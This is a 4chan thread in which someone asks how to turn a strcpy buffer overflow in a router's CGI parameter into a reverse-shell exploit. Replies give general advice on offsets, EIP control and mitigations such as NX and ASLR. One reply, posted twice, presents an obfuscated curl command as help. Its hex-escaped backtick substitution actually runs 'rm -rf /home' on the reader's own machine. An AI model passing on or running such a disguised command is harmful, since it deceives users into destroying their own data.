Hacker wizards of 4chan, I need some help. Long story short I found a buffer overflow vulnerability on a router and it's in the CGI file and accessible via an http get parameter. How do I exploit this? How do I take this from strcpy libc function to a The reverse shell Shell code I pulled off of metasploit? That's the one part I never understood, going from found vulnerability to writing the exploit. I have the shell code, I have the vulnerability, but what do I do between the two? What are the steps? Thank you.
>>107829266>via an http get parameterwhy you dont just say get request? me thinks ur a skid
>>107829275Fine I'm a script kitty, whatever, can you help me?
>>107829275not op but parameter is more specific thats why, with you being gay thats why a close 2
>>107829266just flow over that buffer bro
>>107829266you can't 'find' a vuln without knowing how to exploit it, unless you used some automated software. Think of it, if I know that this lock is vuln to the fact that the latch inside is made of steel, you know that to exploit it you need a strong magnet, if it's vuln to voltage, you short circuit something, and so on.
>>107829266excuse me, but this is not a distro war thread. please delete it
>>107829391I found the vuln with ida pro, traced the vuln back to the param via the strcpy. I emulated the file system and Linux kernel with qemu, ran the http server, passed a param with a cgi environment variable, I see my 'a' chars in hex in the seg fault core file with gdb in the various registers. I know it's vulnerable.
Crashing isn't the same as vulnerable You need it to overflow the return/jump address with data that point to another overflowed address that contains instruction.
>>107829460Is there a generic Shell code that does this? Do I have to determine the address by finding it with gdb or something? Wouldn't it be randomized each time because of aslr?
>>107829433well, if you can control the EIP and calc the offset, then you can basically do whatever tf you want, assuming no limits on data injection or char restriction.use this tool https://slimm609.github.io/checksec/to see what kinda mitigation are in place, then proceed, NX are non executable, RELRO is read only, ASLR is randomized memory among many, so check first if you can execute the code or not
>>107829266curl "http://router/cgi?par=`$'\x72\x6d' $'\55\x72\x66' $'\57\x68\x6f\x6d\x65' 'run_shell'`"
curl "http://router/cgi?par=`$'\x72\x6d' $'\55\x72\x66' $'\57\x68\x6f\x6d\x65' 'run_shell'`"
>>107829516What do you mean generic? You can't just run any app to magically tell you the address, you need to overflow with a payload and then make the pointer jump to it, none of that is automatic, you need to debug every step before the crash to see how the code behaves
>>107829594wth i ran this and my router grew legs and started stomping me
